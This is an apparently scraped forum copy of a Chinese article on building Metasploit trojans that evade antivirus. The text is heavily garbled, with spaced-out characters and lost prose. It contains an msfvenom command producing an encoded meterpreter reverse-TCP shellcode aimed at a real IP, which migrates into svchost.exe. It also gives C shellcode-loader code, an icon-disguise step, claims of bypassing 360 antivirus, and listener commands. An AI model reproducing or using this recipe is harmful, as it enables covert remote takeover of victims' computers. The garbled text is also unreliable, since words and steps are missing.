[12592] 2018-04-16_Metasploit的简单木马免杀技术及后渗透面临的问题

文档创建者:s7ckTeam
浏览次数:0
最后更新:2025-01-18
2018-04-16_Metasploit的简单木马免杀技术及后渗透面临的问题 M e t a s p l o i t c u r e a l l   F r e e B u f   2 0 1 8 - 0 4 - 1 6 P S .   n g r o k 穿 穿 穿 穿 n g r o k s u n n y n g r o k h t t p s : / / n g r o k . c o m / g i t h u b k a l i k a l i . / n g r o k   a u t h t o k e n   1 2 3 4 , . / n g r o k   t c p   1 2 3 4
p i n g I P p i n g I P 穿 e g g . U S B m s f s h e l l c o d e p a y l l o a d w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p L H O S T L P O R T n g r o k - e x 8 6 / s h i k a t a _ g a _ n a i   - i   1 5 - e   x 8 6 / s h i k a t a _ g a _ n a i 1 5 P r e p e n d M i g r a t e = t r u e P r e p e n d M i g r a t e P r o c = s v c h o s t . e x e 使 s v c h o s t . e x e 使 w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p _ r c 4 p a y l o a d , e x e n x 8 6 / s h i k a t a _ g a _ n a 1 2 s h e l l c o d e s h e l l c o d e . c m s f v e n o m   - p   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p   - a   x 8 6   - - p l a t f o r m   w i n d o w s   L H O S T = 5 2 . 1 4 . 6 1 . 4 7   L P O R T = 1 3 0 9 8   - e   x 8 6 / s h i k a t a _ g a _ n a i   - i   1 5   - b   ' x 0 0 '   P r e p e n d M i g r a t e = t r u e   P r e p e n d M i g r a t e P r o c = s v c h o s t . e x e   - f   c   >   / r o o t / D e s k t o p / s h e l l c o d e . c
  w i n d o w s ,   u n s i g n e d   c h a r   b u f [ ]   = 使 v s 2 0 1 5 h t t p s : / / p a n . b a i d u . c o m / s / 1 B g x Z e C T Z o F v p m _ l h x c R X C w   b c h i v i s u a l   s t u d i o c + + w i n 3 2 s h e l l c o d e s h e l l c o d e - - - - , * . i c o n   Q Q 1 i c o n . i c o Q Q 1 i c o n . i c o v s # i n c l u d e < s t d i o . h > # i n c l u d e < w i n d o w s . h > # p r a g m a   c o m m e n t ( l i n k e r , " / s u b s y s t e m : " w i n d o w s "   / e n t r y : " m a i n C R T S t a r t u p " " )                                                 / / u n s i g n e d   c h a r   s h e l l c o d e [ ] =   s h e l l c o d e v o i d   m a i n ( ) {   L P V O I D   M e m o r y   =   V i r t u a l A l l o c ( N U L L ,   s i z e o f ( s h e l l c o d e ) ,   M E M _ C O M M I T   |   M E M _ R E S E R V E ,   P A G E _ E X E C U T E _ R E A D W R I T E ) ;   m e m c p y ( M e m o r y ,   s h e l l c o d e ,   s i z e o f ( s h e l l c o d e ) ) ;   ( ( v o i d ( * ) ( ) ) M e m o r y ) ( ) ; }
Q Q 使 使 3 6 0 s h e l l c o d e c 使 # p r a g m a c o m m e n t ( l i n k e r , / s u b s y s t e m : w i n d o w s   / e n t r y : m a i n C R T S t a r t u p ) 3 6 0
. m e t e r p r e t e r L H O S T L P O R T n g r o k ! ! 3 6 0 m e t e r p r e t e r g e t s y s t e m m s f 3 6 0 u s e   e x p l o i t / m u l t i / h a n d l e r s e t   p a y l o a d   w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p s e t   L H O S T   1 2 7 . 0 . 0 . 1 s e t   L P O R T   1 2 3 4 e x p l o i t
使 3 6 0 3 6 0 3 6 0 3 6 0 3 6 0 使 m s f * c u r e a l l F r e e B u f W e b c a m _ s n a p   1

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则